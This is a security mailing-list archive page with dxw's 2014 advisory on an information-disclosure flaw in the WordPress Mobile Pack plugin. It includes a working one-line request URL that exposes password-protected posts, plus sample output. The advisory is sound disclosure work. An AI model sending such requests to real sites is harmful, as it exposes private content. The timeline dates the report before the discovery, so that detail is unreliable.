| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <2e7429c47c3828fba573d467076fe39d@security.dxw.com>
Date: Wed, 20 Aug 2014 10:31:31 +0000
From: dxw Security <security@....com>
To: fulldisclosure@...lists.org
Subject: [FD] Information disclosure vulnerability in WordPress Mobile Pack
allows anybody to read password protected posts (WordPress plugin)
Details
================
Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)
Description
================
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts
Vulnerability
================
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected).
Proof of concept
================
Create a password-protected post
Enable WordPress Mobile Pack
Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()”
Example output:
x (
{
\"articles\": [
{
\"id\": 849,
\"title\": \"Secret post\",
\"timestamp\": 1406231170,
\"author\": \"admin\",
\"date\": \"Thu, Jul 24, 2014, 19:46\",
\"link\": \"http://wp.local/?p=849\",
\"image\": \"\",
\"description\": \"<p>HUSH THIS IS A SECRET</p>n\",
\"content\": \"\",
\"category_id\": 1,
\"category_name\": \"Uncategorized\"
}
]
}
)
Mitigations
================
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@....com to acknowledge this report if you received it via a third party (for example, plugins@...dpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists